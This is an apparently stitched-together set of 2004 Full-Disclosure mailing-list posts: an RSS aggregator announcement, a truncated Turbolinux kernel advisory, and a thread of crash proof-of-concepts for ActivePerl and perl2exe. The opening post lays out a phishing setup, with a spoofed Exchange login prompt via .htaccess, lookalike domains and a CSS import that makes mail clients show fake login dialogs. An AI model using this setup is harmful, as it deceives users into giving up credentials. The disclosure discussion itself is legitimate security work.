Phriday , May 21, 2004 Several pheeble yet interesting phishing possibilities arise as phollows: Take one .htaccess trivially modified to suit the target scenario: AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN" AuthType Basic One throw-away domain which can include the target's host name: http://www.hotmail.hackerguy.nickelandimehosting.com http://www.evenlargerbank.money.nickelandimehosting.com http://www.bloatedcorp.lackey.nickelandimehosting.com A couple of ridiculous email contraptions: @import url( http://www.malware.com/pheesh ); 1. Outlook Express [screen shot http://www.malware.com/phool.png 56KB] 2. Outlook 2003 [screen shot: http://www.malware.com/ohlook.png 39KB] note: the above 'style sheet' works on outbound [reply to] [so much for not downloading external content] inbound can be achieved as well via http://securityfocus.com/bid/10369 which has an even more convincing network login applet 3. Hotmail [screen shot: http://www.malware.com/goturmail.png 91KB] hint : hotmail[and other] web designer people; off-set the html login form on the site as many prime banks have done. The possibilities are obviously endless. BE AWARE OF THE SHARKS OUT THERE NB: anyone have any contact or connection to the upper management security or abuse dept. of one public company called: SAVVIS Communications. http://savvis.net/ it appears their abuse dept. is woefully negligent in attending to abuse affairs. End Call -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Web interface for full-disclosure and others
wow that's nice..any chance you setting up an rss feed of your site? vertex wrote: Hello, I am building a web interface which will help to monitoring the mailing list easier. The interface get the RSS feed from seclist.org and other web site and convert them into a single web interface. Now the web interface include full-disclosure, bugtraq, Internet Storm Center, OSVDB, and others. The web interface also include a Drupal based forum. Check it out at http://www.securitytrap.com/mail.html Any suggestoin is welcome, -vertex -- My "Foundation" verse: Isa 54:17 No weapon that is formed against thee shall prosper; and every tongue that shall rise against thee in judgment thou shalt condemn. This is the heritage of the servants of the LORD, and their righteousness is of me, saith the LORD. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [TURBOLINUX SECURITY INFO] 21/May/2004
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 This is an announcement only email list for the x86 architecture. Turbolinux Security Announcement 21/May/2004 The following page contains the security information of Turbolinux Inc. - Turbolinux Security Center http://www.turbolinux.com/security/ (1) kernel -> Multiple vulnerabilities within the kernel === * kernel -> Multiple vulnerabilities within the kernel === More information : The kernel package contains the Linux kernel (vmlinuz), the core of your Linux operating system. - Real time clock (RTC) routines in Linux kernel does not properly initialize their structures, which could leak kernel data to user space. - The R128 driver has a vulnerability. - Stack-based buffer overflow in the ncp_lookup function for ncpfs in kernel. - Buffer overflow in the ISO9660 file system component for Linux kernel. - The OSS code for the Sound Blaster driver in Linux 2.4.x does not properly handle certain sample sizes, which allows local users to cause a denial of service (crash). - The JFS file system code in Linux 2.4.x has an information leak in which in-memory data is written to the device for an ext3 file system, which allows local users to obtain sensitive information by reading the raw device. - A "potential" buffer overflow exists in the panic() function in kernel. - The do_fork function in Linux 2.4.x and 2.6.x does not properly decrement the mm_count counter when an error occurs after the mm_struct for a child process has been activated, which triggers a memory leak that allows local users to cause a denial of service (memory exhaustion). Impact : The vulnerabilities may allow an attacker to cause a denial of service to the kernel and gain sensitive information from your system. Affected Products : - Turbolinux Appliance Server 1.0 Hosting Edition - Turbolinux Appliance Server 1.0 Workgroup Edition - Turbolinux 10 Desktop - Turbolinux 8 Server - Turbolinux 8 Workstation - Turbolinux 7 Server - Turbolinux 7 Workstation Solution : Please use the turbopkg (zabom) tool to apply the update. - # turboupdate # turbopkg # zabom update kernel kernel-BOOT kernel-doc kernel-headers \ kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source - Source Packages Size : MD5 kernel-2.4.25-3.src.rpm 36845560 43f987c9ba58bef4d2052d517bae91a3 Binary Packages Size : MD5 kernel-2.4.25-3.i586.rpm 13768395 961cb1242dc89e6b815cece76aecfe42 kernel-BOOT-2.4.25-3.i586.rpm 6894271 f2ed3e7abd7cba9d90a50a8996aa8115 kernel-doc-2.4.25-3.i586.rpm 1573387 4d5f79df18f678771d1a8470d21810e0 kernel-headers-2.4.25-3.i586.rpm 1986966 7c265f85713748fc7fd20df340c8d7ee kernel-pcmcia-cs-2.4.25-3.i586.rpm 365681 f74d9b0d52602a69df8825831d92edca kernel-smp-2.4.25-3.i586.rpm 14161425 9cc5b89c2f126904a2cca9ebd7700531 kernel-smp64G-2.4.25-3.i586.rpm 14139065 65dcf2069df77cd6ecd74b234187df8a kernel-source-2.4.25-3.i586.rpm 27434031 a965e854d02602e541b26409e4d1d244 Source Packages Size : MD5 kernel-2.4.25-3.src.rpm 36845560 43f987c9ba58bef4d2052d517bae91a3 Binary Packages Size : MD5 kernel-2.4.25-3.i586.rpm 13768395 961cb1242dc89e6b815cece76aecfe42 kernel-BOOT-2.4.25-3.i586.rpm 6894271 f2ed3e7abd7cba9d90a50a8996aa8115 kernel-doc-2.4.25-3.i586.rpm 1573387 4d5f79df18f678771d1a8470d21810e0 kernel-headers-2.4.25-3.i586.rpm 1986966 7c265f85713748fc7fd20df340c8d7ee kernel-pcmcia-cs-2.4.25-3.i586.rpm 365681 f74d9b0d52602a69df8825831d92edca kernel-smp-2.4.25-3.i586.rpm 14161425 9cc5b89c2f126904a2cca9ebd7700531 kernel-smp64G-2.4.25-3.i586.rpm 14139065 65dcf2069df77cd6ecd74b234187df8a kernel-source-2.4.25-3.i586.rpm 27434031 a965e854d02602e541b26409e4d1d244 Source Packages Size : MD5 ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/SRPMS/kernel-2.6.0-8.src.rpm 47387817 b0e9f3c652a6692b6d4741cd2e539453 Binary Packages Size : MD5 ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-2.6.0-8.i586.rpm 13148949 99104a31b0a0d5c71028a76d8bd00ad9 ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-doc-2.6.0-8.i586.rpm 1662274 c2db44905b2022da855158cd38f0de33 ftp://ftp.turbolinux.com/pub/TurboLinux/TurboLinux/ia32/Desktop/10/updates/RPMS/kernel-extramodules-2.6.0-8.i586.rpm 2965265 69554343ca7d2a30a9636bd5255b0b45 ftp
Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in ActivePerl ?
further testing...
c:\>type test1.pl
#test1.pl
$a="A" x 256; system($a);
http://[host]/test1.pl
[host - output ]
The instruction at "0x28073f63" referenced memory at "0x01c42ce0".
The memory could not be "read"
c:\>type test2.pl
#test2.pl
$a="A" x 261; system($a);
http://[host]/test2.pl
[host - output ]
The instruction at "0x28073f63" referenced memory at "0x42c42ce0".
The memory could not be "read"
Donnie Werner
http://exploitlabs.com
- Original Message -
From: "Stephen Blass" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, May 20, 2004 2:15 PM
Subject: RE: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
ActivePerl ?
> Perl2Exe rolls the interpreter up into the exe so if the interpreter is
vulnerable, then the exe will be too. With the service compiler you will have
the same situation in services compiled as 'standalone'; if you compile
'dependent' services you are at the mercy of the perl interpreter on the system
you deploy the service on.
>
> You can change the behavior of the perl 'system' in a perl script like so.
>
> use subs qw (system);
> sub system { my ($cmd)[EMAIL PROTECTED]; print"what, me run $cmd ? "; }
> $a="A" x 256; system($a);
>
> You can reach out from your custom system subroutine to the real thing if
you'd like by calling CORE::system if you want to scrub arguments some more
before passing them to the system.
>
> -
> Steve Blass
>
>
>
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] Behalf Of Clint
> Bodungen
> Sent: Thursday, May 20, 2004 12:44 PM
> To: morning_wood; 0day; [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow
> in ActivePerl ?
>
>
> I haven't tested it yet but this also probably means that the msi/Microsoft
> service compilor in the Activeperl Developer's Kit is as well then.
>
>
> - Original Message -
> From: "morning_wood" <[EMAIL PROTECTED]>
> To: "0day" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: Thursday, May 20, 2004 2:08 PM
> Subject: [Full-Disclosure] ActivePerl Perl2Exe [was] Buffer Overflow in
> ActivePerl ?
>
>
> > binaries created via perl2exe also are affected.
> >
> > C:\>type 1.pl
> > #
> > $a="A" x 256; system($a);
> >
> > C:\>perl2exe -v 1.pl
> > Perl2Exe V7.02 Copyright (c) 1997-2003 IndigoSTAR Software
> > Cmd = -v 1.pl
> > CWD = C:\
> > Known platforms: Win32
> > Target platform = Win32 5.006001
> > $I =
> > $ENV{'PERL5LIB'} =
> > Found perl.exe at C:\Perl\bin
> > LibList = C:\Perl\lib,C:\Perl\site\lib,.
> > Converting '1.pl' to 1.exe
> > Compiling 1.pl
> >
> > C:\>1.exe
> > [BIG CRASH]
> >
> > C:\>
> >
> >
> >
> > Donnie Werner
> > http://exploitlabs.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Web interface for full-disclosure and others
Hello, I am building a web interface which will help to monitoring the mailing list easier. The interface get the RSS feed from seclist.org and other web site and convert them into a single web interface. Now the web interface include full-disclosure, bugtraq, Internet Storm Center, OSVDB, and others. The web interface also include a Drupal based forum. Check it out at http://www.securitytrap.com/mail.html Any suggestoin is welcome, -vertex -- http://www.securitytrap.com Security by full disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
